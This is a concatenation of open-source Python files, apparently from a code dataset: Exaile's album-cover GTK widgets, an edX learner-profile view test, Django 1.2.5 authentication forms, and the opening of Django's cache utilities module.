cover_data = COVER_MANAGER.get_cover(track, set_only=True)
cover_pixbuf = pixbuf_from_data(cover_data) if cover_data else None
# Do not bother showing the dialog if there is no cover
if cover_pixbuf:
savedir = Gio.File.new_for_uri(track.get_loc_for_io()).get_parent()
if savedir:
savedir = savedir.get_path()
cover_window = CoverWindow(self.window, cover_pixbuf, album[1], savedir)
cover_window.show_all()
def fetch_cover(self):
"""
Shows the cover chooser for the currently selected album
"""
paths = self.previews_box.get_selected_items()
if paths:
path = paths[0]
album = self.model[path][0]
track = self.album_tracks[album][0]
cover_chooser = CoverChooser(self.window, track)
# Make sure we're updating the correct album after selection
cover_chooser.path = path
cover_chooser.connect('cover-chosen', self.on_cover_chosen)
def remove_cover(self):
"""
Removes the cover of the currently selected album
"""
paths = self.previews_box.get_selected_items()
if paths:
path = paths[0]
album = self.model[path][0]
track = self.album_tracks[album][0]
COVER_MANAGER.remove_cover(track)
self.model[path][1] = self.default_cover_pixbuf
def do_prefetch_started(self):
"""
Sets the widget states to prefetching
"""
self.previews_box.set_model(None)
self.model.clear()
self.previews_box.set_sensitive(False)
self.fetch_button.set_sensitive(False)
self.progress_bar.set_fraction(0)
GLib.source_remove(self.progress_bar.pulse_timeout)
def do_prefetch_completed(self, outstanding):
"""
Sets the widget states to ready for fetching
"""
self.previews_box.set_sensitive(True)
self.previews_box.set_model(self.model)
self.fetch_button.set_sensitive(True)
self.progress_bar.set_fraction(0)
self.progress_bar.set_text(
self.outstanding_text.format(outstanding=outstanding)
)
def do_prefetch_progress(self, progress):
"""
Updates the wiedgets to reflect the processed album
"""
fraction = progress / float(len(self.album_tracks))
self.progress_bar.set_fraction(fraction)
def do_fetch_started(self, outstanding):
"""
Sets the widget states to fetching
"""
self.previews_box.set_sensitive(False)
self.stop_button.set_sensitive(True)
self.fetch_button.set_sensitive(False)
self.progress_bar.set_fraction(0)
# We need float for the fraction during progress
self.progress_bar.outstanding_total = float(outstanding)
def do_fetch_completed(self, outstanding):
"""
Sets the widget states to ready for fetching
"""
self.previews_box.set_sensitive(True)
self.stop_button.set_sensitive(False)
if outstanding > 0:
# If there are covers left for some reason, allow re-fetch
self.fetch_button.set_sensitive(True)
self.progress_bar.set_fraction(0)
def do_fetch_progress(self, progress):
"""
Updates the widgets to reflect the processed album
"""
outstanding = len(self.outstanding)
if outstanding > 0:
progress_text = self.outstanding_text.format(outstanding=outstanding)
else:
progress_text = self.completed_text
self.progress_bar.set_text(progress_text)
fraction = progress / self.progress_bar.outstanding_total
self.progress_bar.set_fraction(fraction)
def do_cover_fetched(self, album, pixbuf):
"""
Updates the widgets to reflect the newly fetched cover
"""
path = self.model_path_cache[album]
self.model[path][1] = pixbuf.scale_simple(
*self.cover_size, interp_type=GdkPixbuf.InterpType.BILINEAR
)
def on_cover_chosen(self, cover_chooser, track, cover_data):
"""
Updates the cover of the current album after user selection
"""
path = cover_chooser.path
if path:
album = self.model[path][0]
pixbuf = pixbuf_from_data(cover_data)
self.emit('cover-fetched', album, pixbuf)
try:
self.outstanding.remove(album)
except ValueError:
pass
else:
outstanding = len(self.outstanding)
if outstanding > 0:
progress_text = self.outstanding_text.format(
outstanding=outstanding
)
else:
progress_text = self.completed_text
self.progress_bar.set_text(progress_text)
def on_previews_box_item_activated(self, iconview, path):
"""
Shows the currently selected cover
"""
self.show_cover()
def on_previews_box_button_press_event(self, widget, e):
"""
Shows the cover menu upon click
"""
path = self.previews_box.get_path_at_pos(int(e.x), int(e.y))
if path:
self.previews_box.select_path(path)
if e.triggers_context_menu():
self.menu.popup(None, None, None, None, 3, e.time)
def on_previews_box_popup_menu(self, menu):
"""
Shows the cover menu upon keyboard interaction
"""
paths = self.previews_box.get_selected_items()
if paths:
self.menu.popup(None, None, None, None, 0, Gtk.get_current_event_time())
def on_previews_box_query_tooltip(self, widget, x, y, keyboard_mode, tooltip):
"""
Custom tooltip display to prevent markup errors
(e.g. due to album names containing "<")
"""
x, y = self.previews_box.convert_widget_to_bin_window_coords(x, y)
path = self.previews_box.get_path_at_pos(x, y)
if path:
tooltip.set_text(self.model[path][2])
self.previews_box.set_tooltip_item(tooltip, path)
return True
return False
def on_progress_pulse_timeout(self):
"""
Updates the progress during prefetching
"""
self.progress_bar.pulse()
return True
def on_close_button_clicked(self, button):
"""
Stops the current fetching process and closes the dialog
"""
self.stopper.set()
self.window.destroy()
# Free some memory
self.model.clear()
del self.outstanding
del self.album_tracks
del self.model_path_cache
def on_stop_button_clicked(self, button):
"""
Stops the current fetching process
"""
self.stopper.set()
def on_fetch_button_clicked(self, button):
"""
Starts the cover fetching process
"""
self.stopper.clear()
thread = threading.Thread(target=self.fetch, name='CoverFetch')
thread.daemon = True
thread.start()
def on_window_delete_event(self, window, e):
"""
Stops the current fetching process and closes the dialog
"""
self.close_button.clicked()
return True
class CoverMenu(menu.Menu):
"""
Cover menu
"""
def __init__(self, widget):
"""
Initializes the menu
"""
menu.Menu.__init__(self, widget)
self.w = widget
self.add_simple(_('Show Cover'), self.on_show_clicked)
self.add_simple(_('Fetch Cover'), self.on_fetch_clicked)
self.add_simple(_('Remove Cover'), self.on_remove_clicked)
def on_show_clicked(self, *e):
"""
Shows the current cover
"""
self.w.show_cover()
def on_fetch_clicked(self, *e):
self.w.fetch_cover()
def on_remove_clicked(self, *e):
self.w.remove_cover()
class CoverWidget(Gtk.EventBox):
"""
Represents the cover widget displayed by the track information
"""
__gsignals__ = {'cover-found': (GObject.SignalFlags.RUN_LAST, None, (object,))}
def __init__(self, image):
"""
Initializes the widget
:param image: the image to wrap
:type image: :class:`Gtk.Image`
"""
GObject.GObject.__init__(self)
self.image = image
self.cover_data = None
self.menu = CoverMenu(self)
self.menu.attach_to_widget(self)
self.filename = None
guiutil.gtk_widget_replace(image, self)
self.add(self.image)
self.set_track(None)
self.image.show()
event.add_callback(self.on_quit_application, 'quit_application')
if settings.get_option('gui/use_alpha', False):
self.set_app_paintable(True)
def destroy(self):
"""
Cleanups
"""
if self.filename is not None and os.path.exists(self.filename):
os.remove(self.filename)
self.filename = None
event.remove_callback(self.on_quit_application, 'quit-application')
def set_track(self, track):
"""
Fetches album covers, and displays them
"""
self.__track = track
self.set_blank()
self.drag_dest_set(
Gtk.DestDefaults.ALL,
[Gtk.TargetEntry.new('text/uri-list', 0, 0)],
Gdk.DragAction.COPY | Gdk.DragAction.DEFAULT | Gdk.DragAction.MOVE,
)
@common.threaded
def __get_cover():
fetch = not settings.get_option('covers/automatic_fetching', True)
cover_data = COVER_MANAGER.get_cover(track, set_only=fetch)
if not cover_data:
return
GLib.idle_add(self.on_cover_chosen, None, track, cover_data)
if track is not None:
__get_cover()
def show_cover(self):
"""
Shows the current cover
"""
if not self.cover_data:
return
pixbuf = pixbuf_from_data(self.cover_data)
if pixbuf:
savedir = Gio.File.new_for_uri(self.__track.get_loc_for_io()).get_parent()
if savedir:
savedir = savedir.get_path()
window = CoverWindow(
self.get_toplevel(),
pixbuf,
self.__track.get_tag_display('album'),
savedir,
)
window.show_all()
def fetch_cover(self):
"""
Fetches a cover for the current track
"""
if not self.__track:
return
window = CoverChooser(self.get_toplevel(), self.__track)
window.connect('cover-chosen', self.on_cover_chosen)
def remove_cover(self):
"""
Removes the cover for the current track from the database
"""
COVER_MANAGER.remove_cover(self.__track)
self.set_blank()
def set_blank(self):
"""
Sets the default cover to display
"""
self.drag_dest_unset()
pixbuf = pixbuf_from_data(COVER_MANAGER.get_default_cover())
self.image.set_from_pixbuf(pixbuf)
self.set_drag_source_enabled(False)
self.cover_data = None
self.emit('cover-found', None)
def set_drag_source_enabled(self, enabled):
"""
Changes the behavior for drag and drop
:param drag_enabled: Whether to allow
drag to other applications
:type enabled: bool
"""
if enabled == getattr(self, '__drag_source_enabled', None):
return
if enabled:
self.drag_source_set(
Gdk.ModifierType.BUTTON1_MASK,
[Gtk.TargetEntry.new('text/uri-list', 0, 0)],
Gdk.DragAction.DEFAULT | Gdk.DragAction.MOVE,
)
else:
self.drag_source_unset()
self.__drag_source_enabled = enabled
def do_button_press_event(self, event):
"""
Called when someone clicks on the cover widget
"""
if self.__track is None or self.get_toplevel() is None:
return
if event.type == Gdk.EventType._2BUTTON_PRESS:
self.show_cover()
elif event.triggers_context_menu():
self.menu.popup(event)
def do_expose_event(self, event):
"""
Paints alpha transparency
"""
opacity = 1 - settings.get_option('gui/transparency', 0.3)
context = self.props.window.cairo_create()
background = self.style.bg[Gtk.StateType.NORMAL]
context.set_source_rgba(
float(background.red) / 256 ** 2,
float(background.green) / 256 ** 2,
float(background.blue) / 256 ** 2,
opacity,
)
context.set_operator(cairo.OPERATOR_SOURCE)
context.paint()
Gtk.EventBox.do_expose_event(self, event)
def do_drag_begin(self, context):
"""
Sets the cover as drag icon
"""
self.drag_source_set_icon_pixbuf(self.image.get_pixbuf())
def do_drag_data_get(self, context, selection, info, time):
"""
Fills the selection with the current cover
"""
if self.filename is None:
self.filename = tempfile.mkstemp(prefix='exaile_cover_')[1]
pixbuf = pixbuf_from_data(self.cover_data)
save_pixbuf(pixbuf, self.filename, 'png')
selection.set_uris([Gio.File.new_for_path(self.filename).get_uri()])
def do_drag_data_delete(self, context):
"""
Cleans up after drag from cover widget
"""
if self.filename is not None and os.path.exists(self.filename):
os.remove(self.filename)
self.filename = None
def do_drag_data_received(self, context, x, y, selection, info, time):
"""
Sets the cover based on the dragged data
"""
if self.__track is not None:
uri = selection.get_uris()[0]
db_string = 'localfile:%s' % uri
try:
stream = Gio.File.new_for_uri(uri).read()
except GLib.Error:
return
self.cover_data = stream.read()
width = settings.get_option('gui/cover_width', 100)
pixbuf = pixbuf_from_data(self.cover_data, (width, width))
if pixbuf is not None:
self.image.set_from_pixbuf(pixbuf)
COVER_MANAGER.set_cover(self.__track, db_string, self.cover_data)
def on_cover_chosen(self, object, track, cover_data):
"""
Called when a cover is selected
from the coverchooser
"""
if self.__track != track:
return
width = settings.get_option('gui/cover_width', 100)
pixbuf = pixbuf_from_data(cover_data, (width, width))
self.image.set_from_pixbuf(pixbuf)
self.set_drag_source_enabled(True)
self.cover_data = cover_data
self.emit('cover-found', pixbuf)
def on_track_tags_changed(self, e, track, tags):
"""
Updates the displayed cover upon tag changes
"""
if self.__track == track:
cover_data = COVER_MANAGER.get_cover(track)
if not cover_data:
return
GLib.idle_add(self.on_cover_chosen, None, cover_data)
def on_quit_application(self, type, exaile, nothing):
"""
Cleans up temporary files
"""
if self.filename is not None and os.path.exists(self.filename):
os.remove(self.filename)
self.filename = None
class CoverWindow(object):
"""Shows the cover in a simple image viewer"""
def __init__(self, parent, pixbuf, album=None, savedir=None):
"""Initializes and shows the cover
:param parent: Parent window to attach to
:type parent: Gtk.Window
:param pixbuf: Pixbuf of the cover image
:type pixbuf: GdkPixbuf.Pixbuf
:param album: Album title
:type album: basestring
:param savedir: Initial directory for the Save As functionality
:type savedir: basestring
"""
self.builder = Gtk.Builder()
self.builder.add_from_file(xdg.get_data_path('ui', 'coverwindow.ui'))
self.builder.connect_signals(self)
self.cover_window = self.builder.get_object('CoverWindow')
self.layout = self.builder.get_object('layout')
self.toolbar = self.builder.get_object('toolbar')
self.save_as_button = self.builder.get_object('save_as_button')
self.zoom_in_button = self.builder.get_object('zoom_in_button')
self.zoom_out_button = self.builder.get_object('zoom_out_button')
self.zoom_100_button = self.builder.get_object('zoom_100_button')
self.zoom_fit_button = self.builder.get_object('zoom_fit_button')
self.close_button = self.builder.get_object('close_button')
self.image = self.builder.get_object('image')
self.statusbar = self.builder.get_object('statusbar')
self.scrolledwindow = self.builder.get_object('scrolledwindow')
self.scrolledwindow.set_hadjustment(self.layout.get_hadjustment())
self.scrolledwindow.set_vadjustment(self.layout.get_vadjustment())
if album:
title = _('Cover for %s') % album
else:
title = _('Cover')
self.savedir = savedir
self.cover_window.set_title(title)
self.cover_window.set_transient_for(parent)
self.cover_window_width = 500
tb_min_height, tb_natural_height = self.toolbar.get_preferred_height()
sb_min_height, sb_natural_height = self.statusbar.get_preferred_height()
self.cover_window_height = 500 + tb_natural_height + sb_natural_height
self.cover_window.set_default_size(
self.cover_window_width, self.cover_window_height
)
self.image_original_pixbuf = pixbuf
self.image_pixbuf = self.image_original_pixbuf
self.min_percent = 1
self.max_percent = 500
self.ratio = 1.5
self.image_interp = GdkPixbuf.InterpType.BILINEAR
self.image_fitted = True
self.set_ratio_to_fit()
self.update_widgets()
def show_all(self):
self.cover_window.show_all()
def available_image_width(self):
"""Returns the available horizontal space for the image"""
return self.cover_window.get_size()[0]
def available_image_height(self):
"""Returns the available vertical space for the image"""
tb_min_height, tb_natural_height = self.toolbar.get_preferred_height()
sb_min_height, sb_natural_height = self.statusbar.get_preferred_height()
return self.cover_window.get_size()[1] - tb_natural_height - sb_natural_height
def center_image(self):
"""Centers the image in the layout"""
new_x = max(
0, int((self.available_image_width() - self.image_pixbuf.get_width()) / 2)
)
new_y = max(
0, int((self.available_image_height() - self.image_pixbuf.get_height()) / 2)
)
self.layout.move(self.image, new_x, new_y)
def update_widgets(self):
"""Updates image, layout, scrolled window, tool bar and status bar"""
window = self.cover_window.get_window()
if window:
window.freeze_updates()
self.apply_zoom()
self.layout.set_size(
self.image_pixbuf.get_width(), self.image_pixbuf.get_height()
)
if self.image_fitted or (
self.image_pixbuf.get_width() == self.available_image_width()
and self.image_pixbuf.get_height() == self.available_image_height()
):
self.scrolledwindow.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.NEVER)
else:
self.scrolledwindow.set_policy(
Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC
)
percent = int(100 * self.image_ratio)
message = (
str(self.image_original_pixbuf.get_width())
+ " x "
+ str(self.image_original_pixbuf.get_height())
+ " pixels "
+ str(percent)
+ '%'
)
self.zoom_in_button.set_sensitive(percent < self.max_percent)
self.zoom_out_button.set_sensitive(percent > self.min_percent)
self.statusbar.pop(self.statusbar.get_context_id(''))
self.statusbar.push(self.statusbar.get_context_id(''), message)
self.image.set_from_pixbuf(self.image_pixbuf)
self.center_image()
if window:
window.thaw_updates()
def apply_zoom(self):
"""Scales the image if needed"""
new_width = int(self.image_original_pixbuf.get_width() * self.image_ratio)
new_height = int(self.image_original_pixbuf.get_height() * self.image_ratio)
if (
new_width != self.image_pixbuf.get_width()
or new_height != self.image_pixbuf.get_height()
):
self.image_pixbuf = self.image_original_pixbuf.scale_simple(
new_width, new_height, self.image_interp
)
def set_ratio_to_fit(self):
"""Calculates and sets the needed ratio to show the full image"""
width_ratio = (
float(self.image_original_pixbuf.get_width()) / self.available_image_width()
)
height_ratio = (
float(self.image_original_pixbuf.get_height())
/ self.available_image_height()
)
self.image_ratio = 1 / max(1, width_ratio, height_ratio)
def on_key_press(self, widget, event, data=None):
"""
Closes the cover window when Escape or Ctrl+W is pressed
"""
if event.keyval == Gdk.KEY_Escape or (
event.state & Gdk.ModifierType.CONTROL_MASK and event.keyval == Gdk.KEY_w
):
widget.destroy()
def on_save_as_button_clicked(self, widget):
"""
Saves image to user-specified location
"""
dialog = Gtk.FileChooserDialog(
_("Save File"),
self.cover_window,
Gtk.FileChooserAction.SAVE,
(
Gtk.STOCK_CANCEL,
Gtk.ResponseType.CANCEL,
Gtk.STOCK_SAVE,
Gtk.ResponseType.ACCEPT,
),
)
names = settings.get_option('covers/localfile/preferred_names')
filename = (names[0] if names else 'cover') + '.png'
dialog.set_current_name(filename)
if self.savedir:
dialog.set_current_folder(self.savedir)
if dialog.run() == Gtk.ResponseType.ACCEPT:
filename = dialog.get_filename()
lowfilename = filename.lower()
if lowfilename.endswith('.jpg') or lowfilename.endswith('.jpeg'):
type_ = 'jpeg'
else:
type_ = 'png'
save_pixbuf(self.image_pixbuf, filename, type_)
dialog.destroy()
def on_zoom_in_button_clicked(self, widget):
"""
Zooms into the image
"""
self.image_fitted = False
self.image_ratio *= self.ratio
self.update_widgets()
def on_zoom_out_button_clicked(self, widget):
"""
Zooms out of the image
"""
self.image_fitted = False
self.image_ratio *= 1 / self.ratio
self.update_widgets()
def on_zoom_100_button_clicked(self, widget):
"""
Restores the original image zoom
"""
self.image_fitted = False
self.image_ratio = 1
self.update_widgets()
def on_zoom_fit_button_clicked(self, widget):
"""
Zooms the image to fit the window width
"""
self.image_fitted = True
self.set_ratio_to_fit()
self.update_widgets()
def on_close_button_clicked(self, widget):
"""
Hides the window
"""
self.cover_window.hide()
def cover_window_size_allocate(self, widget, allocation):
if (
self.cover_window_width != allocation.width
or self.cover_window_height != allocation.height
):
if self.image_fitted:
self.set_ratio_to_fit()
self.update_widgets()
self.cover_window_width = allocation.width
self.cover_window_height = allocation.height
class CoverChooser(GObject.GObject):
"""
Fetches all album covers for a string, and allows the user to choose
one out of the list
"""
__gsignals__ = {
'covers-fetched': (GObject.SignalFlags.RUN_LAST, None, (object,)),
'cover-chosen': (GObject.SignalFlags.RUN_LAST, None, (object, object)),
}
def __init__(self, parent, track, search=None):
"""
Expects the parent control, a track, an an optional search string
"""
GObject.GObject.__init__(self)
self.parent = parent
self.builder = Gtk.Builder()
self.builder.add_from_file(xdg.get_data_path('ui', 'coverchooser.ui'))
self.builder.connect_signals(self)
self.window = self.builder.get_object('CoverChooser')
self.window.set_title(
_("Cover options for %(artist)s - %(album)s")
% {
'artist': track.get_tag_display('artist'),
'album': track.get_tag_display('album'),
}
)
self.window.set_transient_for(parent)
self.message = dialogs.MessageBar(
parent=self.builder.get_object('main_container'),
buttons=Gtk.ButtonsType.CLOSE,
)
self.message.connect('response', self.on_message_response)
self.track = track
self.covers = []
self.current = 0
self.cover = guiutil.ScalableImageWidget()
self.cover.set_image_size(350, 350)
self.cover_image_box = self.builder.get_object('cover_image_box')
self.stack = self.builder.get_object('stack')
self.stack_ready = self.builder.get_object('stack_ready')
self.size_label = self.builder.get_object('size_label')
self.source_label = self.builder.get_object('source_label')
self.covers_model = self.builder.get_object('covers_model')
self.previews_box = self.builder.get_object('previews_box')
self.previews_box.set_no_show_all(True)
self.previews_box.hide()
self.previews_box.set_model(None)
self.set_button = self.builder.get_object('set_button')
self.set_button.set_sensitive(False)
self.window.show_all()
self.stopper = threading.Event()
self.fetcher_thread = threading.Thread(
target=self.fetch_cover, name='Coverfetcher'
)
self.fetcher_thread.start()
def fetch_cover(self):
"""
Searches for covers for the current track
"""
db_strings = COVER_MANAGER.find_covers(self.track)
if db_strings:
for db_string in db_strings:
if self.stopper.is_set():
return
coverdata = COVER_MANAGER.get_cover_data(db_string)
# Pre-render everything for faster display later
pixbuf = pixbuf_from_data(coverdata)
if pixbuf:
self.covers_model.append(
[
(db_string, coverdata),
pixbuf,
pixbuf.scale_simple(50, 50, GdkPixbuf.InterpType.BILINEAR),
]
)
self.emit('covers-fetched', db_strings)
def do_covers_fetched(self, db_strings):
"""
Finishes the dialog setup after all covers have been fetched
"""
if self.stopper.is_set():
return
self.stack.set_visible_child(self.stack_ready)
self.previews_box.set_model(self.covers_model)
if db_strings:
self.cover_image_box.pack_start(self.cover, True, True, 0)
self.cover.show()
self.set_button.set_sensitive(True)
# Show thumbnail bar if more than one cover was found
if len(db_strings) > 1:
self.previews_box.set_no_show_all(False)
self.previews_box.show_all()
# Try to select the current cover of the track, fallback to first
track_db_string = COVER_MANAGER.get_db_string(self.track)
position = (
db_strings.index(track_db_string)
if track_db_string in db_strings
else 0
)
self.previews_box.select_path(Gtk.TreePath(position))
else:
self.builder.get_object('stack').hide()
self.builder.get_object('actions_box').hide()
self.message.show_warning(
_('No covers found.'),
_(
'None of the enabled sources has a cover for this track, try enabling more sources.'
),
)
def on_cancel_button_clicked(self, button):
"""
Closes the cover chooser
"""
# Notify the fetcher thread to stop
self.stopper.set()
self.window.destroy()
def on_set_button_clicked(self, button):
"""
Chooses the current cover and saves it to the database
"""
paths = self.previews_box.get_selected_items()
if paths:
path = paths[0]
coverdata = self.covers_model[path][0]
COVER_MANAGER.set_cover(self.track, coverdata[0], coverdata[1])
self.emit('cover-chosen', self.track, coverdata[1])
self.window.destroy()
def on_previews_box_selection_changed(self, iconview):
"""
Switches the currently displayed cover
"""
paths = self.previews_box.get_selected_items()
if paths:
path = paths[0]
db_string = self.covers_model[path][0]
source = db_string[0].split(':', 1)[0]
provider = providers.get_provider('covers', source)
pixbuf = self.covers_model[path][1]
self.cover.set_image_pixbuf(pixbuf)
self.size_label.set_text(
_('{width}x{height} pixels').format(
width=pixbuf.get_width(), height=pixbuf.get_height()
)
)
# Display readable title of the provider, fallback to its name
self.source_label.set_text(getattr(provider, 'title', source))
self.set_button.set_sensitive(True)
else:
self.set_button.set_sensitive(False)
def on_previews_box_item_activated(self, iconview, path):
"""
Triggers selecting the current cover
"""
self.set_button.clicked()
def on_message_response(self, widget, response):
"""
Handles the response for closing
"""
if response == Gtk.ResponseType.CLOSE:
self.window.destroy()
| gpl-2.0 |
bigdatauniversity/edx-platform | lms/djangoapps/student_profile/test/test_views.py | 113 | 3370 | # -*- coding: utf-8 -*-
""" Tests for student profile views. """
from django.conf import settings
from django.core.urlresolvers import reverse
from django.test import TestCase
from django.test.client import RequestFactory
from util.testing import UrlResetMixin
from student.tests.factories import UserFactory
from student_profile.views import learner_profile_context
class LearnerProfileViewTest(UrlResetMixin, TestCase):
""" Tests for the student profile view. """
USERNAME = "username"
PASSWORD = "password"
CONTEXT_DATA = [
'default_public_account_fields',
'accounts_api_url',
'preferences_api_url',
'account_settings_page_url',
'has_preferences_access',
'own_profile',
'country_options',
'language_options',
'account_settings_data',
'preferences_data',
]
def setUp(self):
super(LearnerProfileViewTest, self).setUp()
self.user = UserFactory.create(username=self.USERNAME, password=self.PASSWORD)
self.client.login(username=self.USERNAME, password=self.PASSWORD)
def test_context(self):
"""
Verify learner profile page context data.
"""
request = RequestFactory().get('/url')
request.user = self.user
context = learner_profile_context(request, self.USERNAME, self.user.is_staff)
self.assertEqual(
context['data']['default_public_account_fields'],
settings.ACCOUNT_VISIBILITY_CONFIGURATION['public_fields']
)
self.assertEqual(
context['data']['accounts_api_url'],
reverse("accounts_api", kwargs={'username': self.user.username})
)
self.assertEqual(
context['data']['preferences_api_url'],
reverse('preferences_api', kwargs={'username': self.user.username})
)
self.assertEqual(
context['data']['profile_image_upload_url'],
reverse("profile_image_upload", kwargs={'username': self.user.username})
)
self.assertEqual(
context['data']['profile_image_remove_url'],
reverse('profile_image_remove', kwargs={'username': self.user.username})
)
self.assertEqual(
context['data']['profile_image_max_bytes'],
settings.PROFILE_IMAGE_MAX_BYTES
)
self.assertEqual(
context['data']['profile_image_min_bytes'],
settings.PROFILE_IMAGE_MIN_BYTES
)
self.assertEqual(context['data']['account_settings_page_url'], reverse('account_settings'))
for attribute in self.CONTEXT_DATA:
self.assertIn(attribute, context['data'])
def test_view(self):
"""
Verify learner profile page view.
"""
profile_path = reverse('learner_profile', kwargs={'username': self.USERNAME})
response = self.client.get(path=profile_path)
for attribute in self.CONTEXT_DATA:
self.assertIn(attribute, response.content)
def test_undefined_profile_page(self):
"""
Verify that a 404 is returned for a non-existent profile page.
"""
profile_path = reverse('learner_profile', kwargs={'username': "no_such_user"})
response = self.client.get(path=profile_path)
self.assertEqual(404, response.status_code)
| agpl-3.0 |
nathanial/lettuce | tests/integration/lib/Django-1.2.5/django/contrib/auth/forms.py | 44 | 8781 | from django.contrib.auth.models import User
from django.contrib.auth import authenticate
from django.contrib.auth.tokens import default_token_generator
from django.contrib.sites.models import get_current_site
from django.template import Context, loader
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.utils.http import int_to_base36
class UserCreationForm(forms.ModelForm):
"""
A form that creates a user, with no privileges, from the given username and password.
"""
username = forms.RegexField(label=_("Username"), max_length=30, regex=r'^[\w.@+-]+$',
help_text = _("Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only."),
error_messages = {'invalid': _("This value may contain only letters, numbers and @/./+/-/_ characters.")})
password1 = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
password2 = forms.CharField(label=_("Password confirmation"), widget=forms.PasswordInput,
help_text = _("Enter the same password as above, for verification."))
class Meta:
model = User
fields = ("username",)
def clean_username(self):
username = self.cleaned_data["username"]
try:
User.objects.get(username=username)
except User.DoesNotExist:
return username
raise forms.ValidationError(_("A user with that username already exists."))
def clean_password2(self):
password1 = self.cleaned_data.get("password1", "")
password2 = self.cleaned_data["password2"]
if password1 != password2:
raise forms.ValidationError(_("The two password fields didn't match."))
return password2
def save(self, commit=True):
user = super(UserCreationForm, self).save(commit=False)
user.set_password(self.cleaned_data["password1"])
if commit:
user.save()
return user
class UserChangeForm(forms.ModelForm):
username = forms.RegexField(label=_("Username"), max_length=30, regex=r'^[\w.@+-]+$',
help_text = _("Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only."),
error_messages = {'invalid': _("This value may contain only letters, numbers and @/./+/-/_ characters.")})
class Meta:
model = User
def __init__(self, *args, **kwargs):
super(UserChangeForm, self).__init__(*args, **kwargs)
f = self.fields.get('user_permissions', None)
if f is not None:
f.queryset = f.queryset.select_related('content_type')
class AuthenticationForm(forms.Form):
"""
Base class for authenticating users. Extend this to get a form that accepts
username/password logins.
"""
username = forms.CharField(label=_("Username"), max_length=30)
password = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
def __init__(self, request=None, *args, **kwargs):
"""
If request is passed in, the form will validate that cookies are
enabled. Note that the request (a HttpRequest object) must have set a
cookie with the key TEST_COOKIE_NAME and value TEST_COOKIE_VALUE before
running this validation.
"""
self.request = request
self.user_cache = None
super(AuthenticationForm, self).__init__(*args, **kwargs)
def clean(self):
username = self.cleaned_data.get('username')
password = self.cleaned_data.get('password')
if username and password:
self.user_cache = authenticate(username=username, password=password)
if self.user_cache is None:
raise forms.ValidationError(_("Please enter a correct username and password. Note that both fields are case-sensitive."))
elif not self.user_cache.is_active:
raise forms.ValidationError(_("This account is inactive."))
# TODO: determine whether this should move to its own method.
if self.request:
if not self.request.session.test_cookie_worked():
raise forms.ValidationError(_("Your Web browser doesn't appear to have cookies enabled. Cookies are required for logging in."))
return self.cleaned_data
def get_user_id(self):
if self.user_cache:
return self.user_cache.id
return None
def get_user(self):
return self.user_cache
class PasswordResetForm(forms.Form):
email = forms.EmailField(label=_("E-mail"), max_length=75)
def clean_email(self):
"""
Validates that a user exists with the given e-mail address.
"""
email = self.cleaned_data["email"]
self.users_cache = User.objects.filter(email__iexact=email)
if len(self.users_cache) == 0:
raise forms.ValidationError(_("That e-mail address doesn't have an associated user account. Are you sure you've registered?"))
return email
def save(self, domain_override=None, email_template_name='registration/password_reset_email.html',
use_https=False, token_generator=default_token_generator, request=None):
"""
Generates a one-use only link for resetting password and sends to the user
"""
from django.core.mail import send_mail
for user in self.users_cache:
if not domain_override:
current_site = get_current_site(request)
site_name = current_site.name
domain = current_site.domain
else:
site_name = domain = domain_override
t = loader.get_template(email_template_name)
c = {
'email': user.email,
'domain': domain,
'site_name': site_name,
'uid': int_to_base36(user.id),
'user': user,
'token': token_generator.make_token(user),
'protocol': use_https and 'https' or 'http',
}
send_mail(_("Password reset on %s") % site_name,
t.render(Context(c)), None, [user.email])
class SetPasswordForm(forms.Form):
"""
A form that lets a user change set his/her password without
entering the old password
"""
new_password1 = forms.CharField(label=_("New password"), widget=forms.PasswordInput)
new_password2 = forms.CharField(label=_("New password confirmation"), widget=forms.PasswordInput)
def __init__(self, user, *args, **kwargs):
self.user = user
super(SetPasswordForm, self).__init__(*args, **kwargs)
def clean_new_password2(self):
password1 = self.cleaned_data.get('new_password1')
password2 = self.cleaned_data.get('new_password2')
if password1 and password2:
if password1 != password2:
raise forms.ValidationError(_("The two password fields didn't match."))
return password2
def save(self, commit=True):
self.user.set_password(self.cleaned_data['new_password1'])
if commit:
self.user.save()
return self.user
class PasswordChangeForm(SetPasswordForm):
"""
A form that lets a user change his/her password by entering
their old password.
"""
old_password = forms.CharField(label=_("Old password"), widget=forms.PasswordInput)
def clean_old_password(self):
"""
Validates that the old_password field is correct.
"""
old_password = self.cleaned_data["old_password"]
if not self.user.check_password(old_password):
raise forms.ValidationError(_("Your old password was entered incorrectly. Please enter it again."))
return old_password
PasswordChangeForm.base_fields.keyOrder = ['old_password', 'new_password1', 'new_password2']
class AdminPasswordChangeForm(forms.Form):
"""
A form used to change the password of a user in the admin interface.
"""
password1 = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
password2 = forms.CharField(label=_("Password (again)"), widget=forms.PasswordInput)
def __init__(self, user, *args, **kwargs):
self.user = user
super(AdminPasswordChangeForm, self).__init__(*args, **kwargs)
def clean_password2(self):
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
if password1 and password2:
if password1 != password2:
raise forms.ValidationError(_("The two password fields didn't match."))
return password2
def save(self, commit=True):
"""
Saves the new password.
"""
self.user.set_password(self.cleaned_data["password1"])
if commit:
self.user.save()
return self.user
| gpl-3.0 |
hackerbot/DjangoDev | django/utils/cache.py | 7 | 11184 | """
This module contains helper functions for controlling caching. It does so by
managing the "Vary" header of responses. It includes functions to patch the
header of response objects directly and decorators that change functions to do
that header-patching themselves.
For information on the Vary header, see:
http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.44
Essentially, the "Vary" HTTP header defines which headers a cache should take
into account when building its cache key. Requests with the same path but
different header content for headers named in "Vary" need to get different
cache keys to prevent delivery of wrong content.
An example: i18n middleware would need to distinguish caches by the
"Accept-language" header.
"""
from __future__ import unicode_literals
import hashlib
import re
import time
from django.conf import settings
from django.core.cache import caches
from django.utils.encoding import force_bytes, force_text, iri_to_uri
from django.utils.http import http_date
from django.utils.timezone import get_current_timezone_name
from django.utils.translation import get_language
cc_delim_re = re.compile(r'\s*,\s*')
def patch_cache_control(response, **kwargs):
"""
This function patches the Cache-Control header by adding all
keyword arguments to it. The transformation is as follows:
